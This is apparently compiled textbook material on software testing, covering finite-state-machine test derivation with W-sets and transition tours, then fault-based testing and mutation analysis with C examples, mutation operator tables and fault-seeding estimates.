Therefore, the W-set for the FSM consists of two input sequences: W-set = {W1, W2}, where W1 = aba and W2 = ba. The transfer sequences for all the states are T(B) = bb, T(C) = ba, and T(D) = b. The reset input sequence is RI = bababa. The input sequence for testing the state transition (D, A, a/x) is given in Table 10.12. In Table 10.12, the columns labeled "message to SUT" and "message from SUT" represent the input message sent to the SUT and the expected output message generated by the SUT, respectively. The current state and the expected next state of the SUT are shown in the columns labeled "current state" and "next state," respectively. During testing, the inputs are applied to the SUT in the order denoted by the column "step." In the first step a transfer sequence is applied to bring the SUT to state D. In step 2, the transition is tested. Then W1 = aba is applied to verify the state (steps 3, 4, and 5). At this point, the state transition is only partially tested, since W1 is not enough to identify the state of an implementation. The reset sequence RI = bababa (steps 6–11) is applied, followed by the transfer sequence T(D) = b (step 12), to bring the SUT into the initial state and into state D, respectively. The test is repeated for the same transition by using W2 = ba (steps 13–21). If all the outputs received from the SUT are as defined by the FSM, the state transition test is completed successfully. If the output of the SUT is not the expected response at any step, an error is detected in the SUT.


TABLE 10.12 Test Sequences for State Transition (D, A, a/x) of FSM in Figure 10.17

Step | Current State | Next State | Message to SUT | Message from SUT

Apply T(D):
1 | A | D | b | y

Test transition (D, A, a/x):
2 | D | A | a | x

Apply W1:
3 | A | A | a | x
4 | A | D | b | y
5 | D | A | a | x

Apply RI:
6 | A | D | b | y
7 | D | A | a | x
8 | A | D | b | y
9 | D | A | a | x
10 | A | D | b | y
11 | D | A | a | x

Apply T(D):
12 | A | D | b | y

Test transition (D, A, a/x):
13 | D | A | a | x

Apply W2:
14 | A | D | b | y
15 | D | A | a | x

Apply RI:
16 | A | D | b | y
17 | D | A | a | x
18 | A | D | b | y
19 | D | A | a | x
20 | A | D | b | y
21 | D | A | a | x

Source: From ref. 11.

Four major methods, namely transition tours, distinguishing sequences, characterizing sequences, and unique input–output (UIO) sequences, are discussed for the generation of tests from an FSM. A question that naturally comes to mind concerns the effectiveness of these techniques, that is, the types of discrepancies detected by each of these methods. Sidhu and Leung [12] present a fault model based on the Monte Carlo simulation technique for estimating the fault coverage of the above four test generation methods. The authors introduced 10 different classes of randomly faulty specifications, each obtained by randomly altering a given specification. For example, class I faults consist of randomly altering an output operation in a given specification. The authors conclude that all the methods except the transition tour method can detect all single faults, as opposed to several faults, introduced in a given specification. In addition, it is also shown that distinguishing, characterizing, and UIO sequences have the same fault detection capability. Another study, similar to the one by Sidhu and Leung, is reported by Dahbura and Sabnani for the UIO sequence method [13].


10.5 TRANSITION TOUR METHOD

In this section, we discuss a process to generate a test sequence or test case Tc from a state transition sequence St of a given FSM M. Specifically, we consider transition tours, where a transition tour is a sequence of state transitions beginning and ending at the initial state. Naito and Tsunoyama [1] introduced the transition tour method for generating test cases from FSM specifications of sequential circuits. Sarikaya and Bochmann [2] were the first to observe that the transition tour method can be applied to protocol testing. An example of a transition tour obtained from Figure 10.8 is as follows: <OH, LP: OFH, LP: DT, AD>, <AD, LP: ONH, LP: —, OH>.

Figure 10.9 Interaction of a test sequence with an SUT: the test system exchanges test sequence events with the SUT at PCO 1 and PCO 2.

One can easily identify the state, input, and expected output components in the sequence of Figure 10.8. However, it may be noted that a test case is not merely a sequence of pairs of <input, expected output>; rather, a complete test case must contain additional behavior such that it can be executed autonomously even if the SUT contains faults. A test system interacting with an SUT is shown in Figure 10.9. A test system consists of a set of test cases and a test case scheduler. The scheduler decides the test case to be executed next depending on the test case dependency constraints specified by a test designer. A test case in execution produces inputs for the SUT and receives outputs from the SUT. It is obvious that a faulty SUT may produce an output which is different from the expected output, and sometimes it may not produce any output at all. Therefore, the test system must be able to handle these exceptional cases in addition to the normal cases. This idea leads us to the following formalization of a process for designing a complete test case:

• A test case contains a sequence of input and expected output data. This information is derived from the FSM specification of the SUT.

• A test case must be prepared to receive unexpected outputs from the SUT.

• A test case must not wait indefinitely to receive an output—expected orunexpected.

Example: Transition Tour. Let us derive a test case from the state transition sequence <OH, LP: OFH, LP: DT, AD>, <AD, LP: ONH, LP: —, OH>. It is useful to refer to a PCO of Figure 10.9, which explains the input–output relationship between the test system and an SUT. A sequence of inputs to the SUT can be obtained from its FSM model. For instance, the state transition sequence contains the input sequence {OFH, ONH}. Therefore, the test system must produce an output sequence {OFH, ONH} for the SUT. Thus, an input in a state transition sequence of an FSM is an output of the test system at the same PCO. An output is represented by prefixing an exclamation mark ('!') to an event (or message) in Figure 10.10. In line 1 of Figure 10.10, LP !OFH means that the test system outputs an event OFH at PCO LP.

1  LP !OFH
2  START(TIMER1, d1)
3     LP ?DT            PASS
4        CANCEL(TIMER1)
5        LP !ONH
6     LP ?OTHERWISE     FAIL
7        CANCEL(TIMER1)
8        LP !ONH
9     ?TIMER1           FAIL
10       CANCEL(TIMER1)
11       LP !ONH

Figure 10.10 Derived test case from transition tour.

An output produced in a state transition of an FSM M is interpreted as an expected output of an implementation IM. Sometimes a faulty implementation may produce unexpected outputs. An output of an SUT becomes an input to the test system. Therefore, an output in a state transition sequence of an FSM is an input to the test system at the same PCO. In Figure 10.10, an input is represented by prefixing a question mark ('?') to an event (or message). Therefore, in line 3 of Figure 10.10, LP ?DT means that the test system is ready to receive the input DT at PCO LP.

Here the test system expects to receive an input DT at PCO LP, which has been specified as LP ?DT. However, a faulty SUT may produce an unexpected output instead of the expected output DT at PCO LP. In line 6, the test system is ready to receive any event other than DT at PCO LP. The reader may notice that LP ?DT in line 3 and LP ?OTHERWISE in line 6 appear at the same level of indentation, and both lines have the same immediate predecessor action START(TIMER1, d1) in line 2.

If an SUT fails to produce any output, expected or unexpected, then the test system and the SUT will be deadlocked, which is prevented by including a timeout mechanism in the test system. Before a test system starts to wait for an input, it starts a timer of a certain duration, as shown in line 2. The name of the timer is TIMER1 in line 2, and its timeout duration is d1. If the SUT fails to produce the expected output DT, or any other output, within an interval of d1 after receiving input OFH at PCO LP, the test system will produce an internal timeout event called TIMER1, which will be received in line 9. One of the events specified in lines 3, 6, and 9 eventually occurs. This means that the test system is not deadlocked in the presence of a faulty SUT.
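The deadlock-avoidance idea of Figure 10.10 can be sketched as a small test driver (illustrative; sut_output is a hypothetical callable that returns the SUT's next output, or None when the timer fires):

def execute_wait_step(sut_output, expected, timeout_d1):
    """Wait for one SUT output under a timer, mirroring lines 2-11 of
    Figure 10.10: the expected event yields PASS; any other event
    (?OTHERWISE) or a timeout (?TIMER1) yields FAIL. The test system
    therefore never blocks indefinitely."""
    event = sut_output(timeout=timeout_d1)  # None models the timeout
    return 'PASS' if event == expected else 'FAIL'

# Example with a stubbed SUT that answers DT within the time limit.
print(execute_wait_step(lambda timeout: 'DT', 'DT', 2.0))  # PASS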

Coverage Metrics for Selecting Transition Tours. One can design one test case from one transition tour. One transition tour may not be sufficient to cover an entire FSM unless it is a long one. Considering the imperative to simplify test design and to test just a small portion of an implementation with one test case, there is a need to design many test cases. A perpetual question is: How many test cases should one design? Therefore, there is a need to identify several transition tours from an FSM. The concept of coverage metrics is used in selecting a set of transition tours. In order to test FSM-based implementations, two commonly used coverage metrics are:

• State coverage

• Transition coverage

Transition Tours for State Coverage. We select a set of transition tours so that every state of an FSM is visited at least once to achieve this coverage criterion. We have identified three transition tours, as shown in Table 10.4, to cover all the states of the FSM shown in Figure 10.8. One can easily obtain test sequences from the three transition tours in Table 10.4 by following the design principles explained in Section 10.5 for transforming a transition tour into a test sequence. State coverage is the weakest among all the selection criteria used to generate test sequences from FSMs. The three transition tours shown in Table 10.4 cover every state of the FSM shown in Figure 10.8 at least once. However, of the 21 state transitions, only 11 are covered by the three transition tours. The 10 state transitions which have not been covered by those three transition tours are listed in Table 10.5. We next consider a stronger form of coverage criterion, namely, transition coverage.

Transition Tours for Transition Coverage. We select a set of transition tours so that every state transition of an FSM is visited at least once to achieve this coverage criterion. We have identified nine transition tours, as shown in Table 10.6, to cover all the state transitions of the FSM shown in Figure 10.8. One can easily obtain test sequences from the nine transition tours in Table 10.6 by following the same design principles.

TABLE 10.4 Transition Tours Covering All States in Figure 10.8

1. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT, SB>; <SB, LP:NOI/LP:FBT, FB>; <FB, LP:NOI/LP:IT, IAF>; <IAF, LP:ONH/—, OH>
   States visited: OH, AD, SB, FB, IAF

2. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, LP:ONH/RP:IT, LON>; <LON, LP:NOI/—, OH>
   States visited: OH, AD, RNG, TK, LON

3. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, RP:ONH/LP:IT, RON>; <RON, LP:ONH/—, OH>
   States visited: OH, AD, RNG, TK, RON


TABLE 10.5 State Transitions Not Covered by Transition Tours of Table 10.4

1. <AD, LP:ONH/—, OH>
2. <AD, LP:NOI/LP:FBT, FB>
3. <SB, LP:ONH/—, OH>
4. <FB, LP:ONH/—, OH>
5. <LON, LP:OFH/LP:IT, TK>
6. <LON, RP:ONH/—, OH>
7. <RON, RP:OFH/—, TK>
8. <RON, LP:NOI/LP:DT, AD>
9. <RNG, LP:ONH/—, OH>
10. <RNG, RP:NOI/FBT, FB>

TABLE 10.6 Transition Tours Covering All State Transitions in Figure 10.8

1. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT, SB>; <SB, LP:NOI/LP:FBT, FB>; <FB, LP:NOI/LP:IT, IAF>; <IAF, LP:ONH/—, OH>

2. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, LP:ONH/RP:IT, LON>; <LON, LP:NOI/—, OH>

3. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, RP:ONH/LP:IT, RON>; <RON, LP:ONH/—, OH>

4. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#2/LP:SBT, SB>; <SB, LP:ONH/—, OH>

5. <OH, LP:OFH/LP:DT, AD>; <AD, LP:NOI/LP:FBT, FB>; <FB, LP:ONH/—, OH>

6. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, LP:ONH/RP:IT, LON>; <LON, LP:OFH/LP:IT, TK>; <TK, RP:ONH/LP:IT, RON>; <RON, RP:OFH/—, TK>; <TK, LP:ONH/RP:IT, LON>; <LON, LP:NOI/—, OH>

7. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:OFH/{LP:IT, RP:IT}, TK>; <TK, RP:ONH/LP:IT, RON>; <RON, LP:NOI/LP:DT, AD>; <AD, LP:ONH/LP:DT, OH>

8. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, LP:ONH/—, OH>

9. <OH, LP:OFH/LP:DT, AD>; <AD, LP:#1/{LP:RT, RP:RING}, RNG>; <RNG, RP:NOI/FBT, FB>; <FB, LP:ONH/—, OH>


Fault based testing – Mutation analysis

Fault-Based Testing

A model of potential program faults is a valuable source of information for evaluating and designing test suites. Some fault knowledge is commonly used in functional and structural testing, for example when identifying singleton and error values for parameter characteristics in category-partition testing or when populating catalogs with erroneous values, but a fault model can also be used more directly. Fault-based testing uses a fault model directly to hypothesize potential faults in a program under test, as well as to create or evaluate test suites based on their efficacy in detecting those hypothetical faults.

16.1 Overview

Engineers study failures to understand how to prevent similar failures in the future. For example, failure of the Tacoma Narrows Bridge in 1940 led to new understanding of oscillation in high wind and to the introduction of analyses to predict and prevent such destructive oscillation in subsequent bridge design. The causes of an airliner crash are likewise extensively studied, and when traced to a structural failure they frequently result in a directive to apply diagnostic tests to all aircraft considered potentially vulnerable to similar failures.

Experience with common software faults sometimes leads to improvements in design methods and programming languages. For example, the main purpose of automatic memory management in Java is not to spare the programmer the trouble of releasing unused memory, but to prevent the programmer from making the kind of memory management errors (dangling pointers, redundant deallocations, and memory leaks) that frequently occur in C and C++ programs. Automatic array bounds checking cannot prevent a programmer from using an index expression outside array bounds, but can make it much less likely that the fault escapes detection in testing, as well as limiting the damage incurred if it does lead to operational failure (eliminating, in particular, the buffer overflow attack as a means of subverting privileged programs). Type checking reliably detects many other faults during program translation.

Of course, not all programmer errors fall into classes that can be prevented or statically detected using better programming languages. Some faults must be detected through testing, and there too we can use knowledge about common faults to be more effective.


The basic concept of fault-based testing is to select test cases that would distinguish the program under test from alternative programs that contain hypothetical faults. This is usually approached by modifying the program under test to actually produce the hypothetical faulty programs. Fault seeding can be used to evaluate the thoroughness of a test suite (that is, as an element of a test adequacy criterion), or for selecting test cases to augment a test suite, or to estimate the number of faults in a program.

16.2 Assumptions in Fault-Based Testing

The effectiveness of fault-based testing depends on the quality of the fault model and on some basic assumptions about the relation of the seeded faults to faults that might actually be present. In practice, the seeded faults are small syntactic changes, like replacing one variable reference by another in an expression, or changing a comparison from < to <=. We may hypothesize that these are representative of faults actually present in the program.

Put another way, if the program under test has an actual fault, we may hypothesize that it differs from another, corrected program by only a small textual change. If so, then we need merely distinguish the program from all such small variants (by selecting test cases for which either the original or the variant program fails) to ensure detection of all such faults. This is known as the competent programmer hypothesis, an assumption that the program under test is "close to" (in the sense of textual difference) a correct program.
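As an illustration (a hypothetical sketch; the function name and threshold are invented), a "competent programmer" fault might be a single-token difference such as > in place of >=, and only a boundary test distinguishes the two versions:

#include <stdio.h>

/* Correct version: the discount applies at exactly 100 units. */
int discount_applies(int units)         { return units >= 100; }

/* Small textual variant: ">" substituted for ">=". */
int discount_applies_variant(int units) { return units > 100; }

int main(void) {
    /* Only the boundary input units == 100 distinguishes the two
       versions, so a test suite able to detect this class of
       one-token faults must include that test case. */
    for (int units = 99; units <= 101; units++)
        printf("units=%d original=%d variant=%d\n",
               units, discount_applies(units), discount_applies_variant(units));
    return 0;
}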

Some program faults are indeed simple typographical errors, and others that involve deeper errors of logic may nonetheless be manifest in simple textual differences. Sometimes, though, an error of logic will result in much more complex differences in program text. This may not invalidate fault-based testing with a simpler fault model, provided test cases sufficient for detecting the simpler faults are sufficient also for detecting the more complex fault. This is known as the coupling effect.

The coupling effect hypothesis may seem odd, but can be justified by appeal to a more plausible hypothesis about interaction of faults. A complex change is equivalent to several smaller changes in program text. If the effect of one of these small changes is not masked by the effect of others, then a test case that differentiates a variant based on a single change may also serve to detect the more complex error.

Fault-Based Testing: Terminology

Original program The program unit (e.g., C function or Java class) to be tested.

Program location A region in the source code. The precise definition is given relative to the syntax of a particular programming language. Typical locations are statements, arithmetic and Boolean expressions, and procedure calls.


Alternate expression Source code text that can be legally substituted for the text at a program location. A substitution is legal if the resulting program is syntactically correct (i.e., it compiles without errors).

Alternate program A program obtained from the original program by substituting an alternate expression for the text at some program location.

Distinct behavior of an alternate program R for a test t The behavior of an alternate program R is distinct from the behavior of the original program P for a test t, if R and P produce different results for t, or if the output of R is not defined for t.

Distinguished set of alternate programs for a test suite T A set of alternate programs is distinguished if each alternate program in the set can be distinguished from the original program by at least one test in T.

Fault-based testing can guarantee fault detection only if the competent programmer hypothesis and the coupling effect hypothesis hold. But guarantees are more than we expect from other approaches to designing or evaluating test suites, including the structural and functional test adequacy criteria discussed in earlier chapters. Fault-based testing techniques can be useful even if we decline to take the leap of faith required to fully accept their underlying assumptions. What is essential is to recognize the dependence of these techniques, and any inferences about software quality based on fault-based testing, on the quality of the fault model. This also implies that developing better fault models, based on hard data about real faults rather than guesses, is a good investment of effort.

16.3 Mutation Analysis

Mutation analysis is the most common form of software fault-based testing. A fault model is used to produce hypothetical faulty programs by creating variants of the program under test. Variants are created by "seeding" faults, that is, by making a small change to the program under test following a pattern in the fault model. The patterns for changing program text are called mutation operators, and each variant program is called a mutant.

Mutation Analysis: Terminology

Original program under test The program or procedure (function) to be tested.

Mutant A program that differs from the original program in one syntactic element (e.g., a statement, a condition, a variable, a label).

Distinguished mutant A mutant that can be distinguished from the original program by executing at least one test case.

Equivalent mutant A mutant that cannot be distinguished from the original program.


Mutation operator A rule for producing a mutant program by syntactically modifying the original program.

Mutants should be plausible as faulty programs. Mutant programs that are rejected by a compiler, or that fail almost all tests, are not good models of the faults we seek to uncover with systematic testing.

We say a mutant is valid if it is syntactically correct. A mutant obtained from the program of Figure 16.1 by substituting while for switch in the statement at line 13 would not be valid, since it would result in a compile-time error. We say a mutant is useful if, in addition to being valid, its behavior differs from the behavior of the original program for no more than a small subset of program test cases. A mutant obtained by substituting 0 for 1000 in the statement at line 4 would be valid, but not useful, since the mutant would be distinguished from the program under test by all inputs and thus would not give any useful information on the effectiveness of a test suite. Defining mutation operators that produce valid and useful mutations is a nontrivial task.

1
2  /** Convert each line from standard input */
3  void transduce() {
4    #define BUFLEN 1000
5    char buf[BUFLEN];  /* Accumulate line into this buffer */
6    int pos = 0;       /* Index for next character in buffer */
7
8    char inChar;       /* Next character from input */
9
10   int atCR = 0;      /* 0="within line", 1="optional DOS LF" */
11
12   while ((inChar = getchar()) != EOF) {
13     switch (inChar) {
14     case LF:
15       if (atCR) {    /* Optional DOS LF */
16         atCR = 0;
17       } else {       /* Encountered CR within line */
18         emit(buf, pos);
19         pos = 0;
20       }
21       break;
22     case CR:
23       emit(buf, pos);
24       pos = 0;
25       atCR = 1;
26       break;
27     default:


28       if (pos >= BUFLEN-2) fail("Buffer overflow");
29       buf[pos++] = inChar;
30     } /* switch */
31   }
32   if (pos > 0) {
33     emit(buf, pos);
34   }
35 }

Figure 16.1: Program transduce converts line endings among Unix, DOS, and Macintosh conventions. The main procedure, which selects the output line end convention, and the output procedure emit are not shown.

Since mutants must be valid, mutation operators are syntactic patterns defined relative to particular programming languages. Figure 16.2 shows some mutation operators for the C language. Constraints are associated with mutation operators to guide selection of test cases likely to distinguish mutants from the original program. For example, the mutation operator svr (scalar variable replacement) can be applied only to variables of compatible type (to be valid), and a test case that distinguishes the mutant from the original program must execute the modified statement in a state in which the original variable and its substitute have different values.

ID    Operator                                     Description                                                Constraint

Operand Modifications
crp   constant for constant replacement            replace constant C1 with constant C2                       C1 ≠ C2
scr   scalar for constant replacement              replace constant C with scalar variable X                  C ≠ X
acr   array for constant replacement               replace constant C with array reference A[I]               C ≠ A[I]
scr   struct for constant replacement              replace constant C with struct field S                     C ≠ S
svr   scalar variable replacement                  replace scalar variable X with a scalar variable Y         X ≠ Y
csr   constant for scalar variable replacement     replace scalar variable X with a constant C                X ≠ C
asr   array for scalar variable replacement        replace scalar variable X with an array reference A[I]     X ≠ A[I]
ssr   struct for scalar replacement                replace scalar variable X with struct field S              X ≠ S
vie   scalar variable initialization elimination   remove initialization of a scalar variable
car   constant for array replacement               replace array reference A[I] with constant C               A[I] ≠ C
sar   scalar for array replacement                 replace array reference A[I] with scalar variable X        A[I] ≠ X
cnr   comparable array replacement                 replace array reference with a comparable array reference
sar   struct for array reference replacement       replace array reference A[I] with a struct field S         A[I] ≠ S

Expression Modifications
abs   absolute value insertion                     replace e by abs(e)                                        e < 0
aor   arithmetic operator replacement              replace arithmetic operator ψ with arithmetic operator φ   e1 ψ e2 ≠ e1 φ e2
lcr   logical connector replacement                replace logical connector ψ with logical connector φ       e1 ψ e2 ≠ e1 φ e2
ror   relational operator replacement              replace relational operator ψ with relational operator φ   e1 ψ e2 ≠ e1 φ e2
uoi   unary operator insertion                     insert unary operator
cpr   constant for predicate replacement           replace predicate with a constant value

Statement Modifications
sdl   statement deletion                           delete a statement
sca   switch case replacement                      replace the label of one case with another
ses   end block shift                              move } one statement earlier or later

Figure 16.2: A sample set of mutation operators for the C language, with associated constraints to select test cases that distinguish generated mutants from the original program.
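To make the svr constraint concrete, here is a hypothetical sketch (not from the text) in which the scalar variable pos in the statement at line 29 of Figure 16.1 is replaced by the compatible scalar atCR; the test must reach the statement in a state where pos ≠ atCR for the mutant to be distinguishable there:

#include <stdio.h>

/* Original statement from line 29 of Figure 16.1, wrapped as a function. */
void store_original(char buf[], int *pos, int *atCR, char inChar) {
    (void)atCR;                 /* atCR unused in the original */
    buf[(*pos)++] = inChar;
}

/* svr mutant: scalar variable pos replaced by the compatible scalar atCR. */
void store_mutant(char buf[], int *pos, int *atCR, char inChar) {
    (void)pos;
    buf[(*atCR)++] = inChar;
}

int main(void) {
    char b1[8] = {0}, b2[8] = {0};
    int pos, atCR;

    pos = 2; atCR = 0;          /* a state satisfying the constraint pos != atCR */
    store_original(b1, &pos, &atCR, 'x');
    pos = 2; atCR = 0;
    store_mutant(b2, &pos, &atCR, 'x');

    /* b1[2] holds 'x' but b2[2] does not, so this state can
       contribute to killing the mutant. */
    printf("buffers differ: %s\n", b1[2] != b2[2] ? "yes" : "no");
    return 0;
}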

Many of the mutation operators of Figure 16.2 can be applied equally well to other procedural languages, but in general a mutation operator that produces valid and useful mutants for a given language may not apply to a different language or may produce invalid or useless mutants for another language. For example, a mutation operator that removes the "friend" keyword from the declaration of a C++ class would not be applicable to Java, which does not include friend classes.

16.4 Fault-Based Adequacy Criteria

Given a program and a test suite T, mutation analysis consists of the following steps:


Select mutation operators If we are interested in specific classes of faults, we may select a set of mutation operators relevant to those faults.

Generate mutants Mutants are generated mechanically by applying mutation operators to the original program.

Distinguish mutants Execute the original program and each generated mutant with the test cases in T. A mutant is killed when it can be distinguished from the original program.

Figure 16.3 shows a sample of mutants for program Transduce, obtained by applying the mutation operators in Figure 16.2.

ID   Operator   Line   Original/Mutant                          1U   1D   2U   2D   2M   End   Long   Mixed

Mi   ror        28     (pos >= BUFLEN-2) → (pos == BUFLEN-2)    -    -    -    -    -    -     -      -

Mj   ror        32     (pos > 0) → (pos >= 0)                   -    x    x    x    x    -     -      -

Mk   sdl        16     atCR = 0 → nothing                       -    -    -    -    -    -     -      -

Ml   ssr        16     atCR = 0 → pos = 0                       -    -    -    -    -    -     -      x

Test case   Description

1U          One line, Unix line-end
1D          One line, DOS line-end
2U          Two lines, Unix line-end
2D          Two lines, DOS line-end
2M          Two lines, Mac line-end
End         Last line not terminated with line-end sequence
Long        Very long line (greater than buffer length)
Mixed       Mix of DOS and Unix line ends in the same file

Figure 16.3: A sample set of mutants for program Transduce generated with mutation operators from Figure 16.2. x indicates the mutant is killed by the test case in the column head.

Test suite TS = {1U, 1D, 2U, 2D, 2M, End, Long} kills Mj, which can be distinguished from the original program by test cases 1D, 2U, 2D, and 2M. Mutants Mi, Mk, and Ml are not distinguished from the original program by any test in TS. We say that mutants not killed by a test suite are live.


A mutant can remain live for two reasons:

• The mutant can be distinguished from the original program, but the test suite T does not contain a test case that distinguishes them (i.e., the test suite is not adequate with respect to the mutant).

• The mutant cannot be distinguished from the original program by any test case (i.e., the mutant is equivalent to the original program).

Given a set of mutants SM and a test suite T, the fraction of nonequivalent mutants killed by T measures the adequacy of T with respect to SM. Unfortunately, the problem of identifying equivalent mutants is undecidable in general, and we could err either by claiming that a mutant is equivalent to the program under test when it is not or by counting some equivalent mutants among the remaining live mutants.

The adequacy of the test suite TS evaluated with respect to the four mutants of Figure 16.3 is 25%. However, we can easily observe that mutant Mi is equivalent to the original program (i.e., no input would distinguish it). Conversely, mutants Mk and Ml seem to be nonequivalent to the original program: There should be at least one test case that distinguishes each of them from the original program. Thus the adequacy of TS, measured after eliminating the equivalent mutant Mi, is 33%.

Mutant Ml is killed by test case Mixed, which represents the unusual case of an input file containing both DOS- and Unix-terminated lines. We would expect that Mixed would also kill Mk, but this does not actually happen: Both Mk and the original program produce the same result for Mixed. This happens because both the mutant and the original program fail in the same way.[1] The use of a simple oracle for checking the correctness of the outputs (e.g., checking each output against an expected output) would reveal the fault. The test suite TS2 obtained by adding test case Mixed to TS would be 100% adequate (relative to this set of mutants) after removing the fault.

Mutation Analysis vs. Structural Testing

For typical sets of syntactic mutants, a mutation-adequate test suite will also be adequate with respect to simple structural criteria such as statement or branch coverage. Mutation adequacy can simulate and subsume a structural coverage criterion if the set of mutants can be killed only by satisfying the corresponding test coverage obligations.

Statement coverage can be simulated by applying the mutation operator sdl (statement deletion) to each statement of a program. To kill a mutant whose only difference from the program under test is the absence of statement S requires executing the mutant and the program under test with a test case that executes S in the original program. Thus to kill all mutants generated by applying the operator sdl to statements of the program under test, we need a test suite that causes the execution of each statement in the original program.


Branch coverage can be simulated by applying the operator cpr (constant for predicate replacement) to all predicates of the program under test with constants True and False. To kill a mutant that differs from the program under test for a predicate P set to the constant value False, we need to execute the mutant and the program under test with a test case that causes the execution of the True branch of P. To kill a mutant that differs from the program under test for a predicate P set to the constant value True, we need to execute the mutant and the program under test with a test case that causes the execution of the False branch of P.

A test suite that satisfies a structural test adequacy criterion may or may not kill all the corresponding mutants. For example, a test suite that satisfies the statement coverage adequacy criterion might not kill an sdl mutant if the value computed at the statement does not affect the behavior of the program on some possible executions.
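A hypothetical sketch of that situation (function and variable names invented): the deleted statement is executed by every test, but its value never affects the output, so the sdl mutant survives a statement-adequate suite:

#include <stdio.h>

int scaled(int x) {
    int trace_count = 0;
    trace_count++;      /* executed by every test, but the value is never
                           used; deleting this statement (an sdl mutant)
                           cannot change any output */
    (void)trace_count;
    return x * 2;
}

int main(void) {
    /* This single test executes every statement of scaled(), achieving
       100% statement coverage, yet it cannot kill the sdl mutant that
       deletes "trace_count++": both versions print 42. */
    printf("%d\n", scaled(21));
    return 0;
}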

[1] The program was in regular use by one of the authors and was believed to be correct. Discovery of the fault came as a surprise while using it as an example for this chapter.

16.5 Variations on Mutation Analysis

The mutation analysis process described in the preceding sections, which kills mutants based on the outputs produced by execution of test cases, is known as strong mutation. It can generate a number of mutants quadratic in the size of the program. Each mutant must be compiled and executed with each test case until it is killed. The time and space required for compiling all mutants and for executing all test cases for each mutant may be impractical.

The computational effort required for mutation analysis can be reduced by decreasing the number of mutants generated and the number of test cases to be executed. Weak mutation analysis decreases the number of tests to be executed by killing mutants when they produce a different intermediate state, rather than waiting for a difference in the final result or observable program behavior.

With weak mutation, a single program can be seeded with many faults. A "metamutant" program is divided into segments containing original and mutated source code, with a mechanism to select which segments to execute. Two copies of the meta-mutant are executed in tandem, one with only original program code selected and the other with a set of live mutants selected. Execution is paused after each segment to compare the program state of the two versions. If the state is equivalent, execution resumes with the next segment of original and mutated code. If the state differs, the mutant is marked as dead, and execution of original and mutated code is restarted with a new selection of live mutants.
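A minimal sketch of the meta-mutant idea, assuming a runtime flag selects between original and mutated segments (the identifiers here are invented for illustration; real tools generate this instrumentation automatically):

#include <stdio.h>

/* Selects which seeded fault is active; 0 means "original code". */
static int active_mutant = 0;

int over_limit(int x) {
    int r;
    /* One instrumented segment of the meta-mutant: original and
       mutated code side by side, selected at run time. */
    if (active_mutant == 1)
        r = (x >= 100);         /* mutant 1: ror, > replaced by >= */
    else
        r = (x > 100);          /* original code */
    /* Weak mutation compares intermediate state at this point: for
       x == 100 the two variants already disagree on r, so mutant 1
       is marked dead without waiting for final program output. */
    return r;
}

int main(void) {
    active_mutant = 0;
    int original_r = over_limit(100);
    active_mutant = 1;
    int mutant_r = over_limit(100);
    printf("mutant 1 is %s\n", original_r != mutant_r ? "dead" : "live");
    return 0;
}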

Weak mutation testing does not decrease the number of program mutants that must be considered, but it does decrease the number of test executions and compilations. This performance benefit has a cost in accuracy: Weak mutation analysis may "kill" a mutant even if the changed intermediate state would not have an effect on the final output or observable behavior of the program.

Like structural test adequacy criteria, mutation analysis can be used either to judge the thoroughness of a test suite or to guide selection of additional test cases. If one is designing test cases to kill particular mutants, then it may be important to have a complete set of mutants generated by a set of mutation operators. If, on the other hand, the goal is a statistical estimate of the extent to which a test suite distinguishes programs with seeded faults from the original program, then only a much smaller statistical sample of mutants is required. Aside from its limitation to assessment rather than creation of test suites, the main limitation of statistical mutation analysis is that partial coverage is meaningful only to the extent that the generated mutants are a valid statistical model of occurrence frequencies of actual faults. To avoid reliance on this implausible assumption, the target coverage should be 100% of the sample; statistical sampling may keep the sample small enough to permit careful examination of equivalent mutants.

Estimating Population Sizes

Counting fish Lake Winnemunchie is inhabited by two kinds of fish, a native trout and an introduced species of chub. The Fish and Wildlife Service wishes to estimate the populations to evaluate their efforts to eradicate the chub without harming the population of native trout.

The population of chub can be estimated statistically as follows. 1000 chub are netted, their dorsal fins are marked by attaching a tag, then they are released back into the lake. Over the next weeks, fishermen are asked to report the number of tagged and untagged chub caught. If 50 tagged chub and 300 untagged chub are caught, we can calculate

    tagged caught / untagged caught = tagged population / untagged population
    50 / 300 = 1000 / untagged population

and thus there are about 6000 untagged chub remaining in the lake.

It may be tempting to also ask fishermen to report the number of trout caught and to perform a similar calculation to estimate the ratio between chub and trout. However, this is valid only if trout and chub are equally easy to catch, or if one can adjust the ratio using a known model of trout and chub vulnerability to fishing.

Counting residual faults A similar procedure can be used to estimate the number of faults in a program: Seed a given number S of faults in the program. Test the program with some test suite and count the number of revealed faults. Measure the number of seeded faults detected, DS, and also the number of natural faults DN detected. Assuming the test suite is as effective at finding natural faults as it is at finding seeded faults, estimate the total number of natural faults N using the proportion

    DS / S = DN / N, that is, N = (S × DN) / DS

so that the number of natural faults remaining in the program is estimated as N − DN.

If we estimate the number of faults remaining in a program by determining the proportion of seeded faults detected, we must be wary of the pitfall of estimating trout population by counting chub. The seeded faults are chub, the real faults are trout, and we must either have good reason for believing the seeded faults are no easier to detect than real remaining faults, or else make adequate allowances for uncertainty. The difference is that we cannot avoid the problem by repeating the process with trout - once a fault has been detected, our knowledge of its presence cannot be erased. We depend, therefore, on a very good fault model, so that the chub are as representative as possible of trout. Of course, if we use special bait for chub, or design test cases to detect particular seeded faults, then statistical estimation of the total population of fish or errors cannot be justified.
